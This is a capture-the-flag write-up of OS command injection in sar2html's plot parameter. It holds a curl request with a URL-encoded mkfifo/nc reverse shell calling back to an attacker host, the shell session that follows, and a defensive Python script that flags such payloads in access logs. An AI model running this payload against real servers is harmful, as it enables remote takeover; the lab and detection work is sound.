OS Command Injection


The target runs a vulnerable instance of sar2html that is affected by a remote code execution vulnerability: the `plot` parameter of `index.php` is passed to the operating system shell without sanitisation, giving OS command injection.

┌──(kali㉿kali)-[~/archive/thm/boiler-ctf]
└─$ curl -i 'http://10.10.124.235/joomla/_test/index.php?plot=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.9.1.194%209999%20%3E%2Ftmp%2Ff'

The request above sends a URL-encoded reverse shell command through the `plot` parameter; decoded, it creates a named pipe in /tmp and wires `bash -i` to `nc` back to the attacking host on port 9999.

┌──(kali㉿kali)-[~/archive/thm/boiler-ctf]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [10.9.1.194] from (UNKNOWN) [10.10.124.235] 50462
bash: cannot set terminal process group (1128): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Vulnerable:/var/www/html/joomla/_test$ whoami
www-data
www-data@Vulnerable:/var/www/html/joomla/_test$ hostname
Vulnerable
www-data@Vulnerable:/var/www/html/joomla/_test$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:74:6d:86:fb:87 brd ff:ff:ff:ff:ff:ff
    inet 10.10.124.235/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::74:6dff:fe86:fb87/64 scope link
       valid_lft forever preferred_lft forever

An initial foothold on the target has been established as the www-data account via OS command injection.
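From the defender's side, the injection above leaves a clear trace in the web server's access log: the `plot` parameter of a sar2html request should only ever hold a plot name, never shell metacharacters. The following script is an added example (not part of this writeup or of sar2html) that decodes the `plot` value from combined-format log lines and flags the ones carrying command chaining or fragments of the mkfifo/nc reverse shell; the log lines are constructed, with the request shown above reused as the malicious entry.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, unquote_plus

# Apache/nginx combined-log prefix: client IP, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d+)'
)
# Shell metacharacters that have no business in a sar2html plot name.
SHELL_META = re.compile(r'[;|&`\n]|\$\(|\$\{')
# Fragments of the mkfifo/nc reverse-shell one-liner sent in the request above.
REVSHELL_HINTS = ('mkfifo', 'nc ', 'bash -i', '/dev/tcp')

def plot_param(uri: str) -> Optional[str]:
    """Decoded value of the `plot` query parameter, or None if absent.
    Split on '&' before decoding, so '%26' or a raw ';' in the payload stays in the value."""
    for pair in urlsplit(uri).query.split('&'):
        key, _, value = pair.partition('=')
        if unquote_plus(key) == 'plot':
            return unquote_plus(value)
    return None

def inspect_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return ip/plot/reasons, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    plot = plot_param(m.group('uri'))
    reasons = []
    if plot is not None:
        if SHELL_META.search(plot):
            reasons.append('shell metacharacters in plot')
        hits = [h for h in REVSHELL_HINTS if h in plot]
        if hits:
            reasons.append('reverse-shell keywords: ' + ', '.join(hits))
    return {'ip': m.group('ip'), 'status': m.group('status'), 'plot': plot, 'reasons': reasons}

def find_suspicious(lines):
    """Return only the records that carry at least one reason to alert on."""
    return [r for r in map(inspect_line, lines) if r and r['reasons']]

# Constructed sample log: a normal plot request, the injected payload from above, an unrelated hit.
SAMPLE_LOG = [
    '10.9.1.50 - - [01/Jan/2024:10:00:01 +0000] "GET /joomla/_test/index.php?plot=cpu HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.9.1.194 - - [01/Jan/2024:10:00:07 +0000] "GET /joomla/_test/index.php?plot=;rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Cbash%20-i%202%3E%261%7Cnc%2010.9.1.194%209999%20%3E%2Ftmp%2Ff HTTP/1.1" 200 0 "-" "curl/8.0"',
    '10.9.1.50 - - [01/Jan/2024:10:00:09 +0000] "GET /joomla/ HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

for rec in find_suspicious(SAMPLE_LOG):
    print(rec['ip'], rec['reasons'], repr(rec['plot']))
```

Only the second constructed line is reported, with both the metacharacter reason and the reverse-shell keywords; feeding the script a real access log shows the same decoded payload an analyst would otherwise have to unescape by hand.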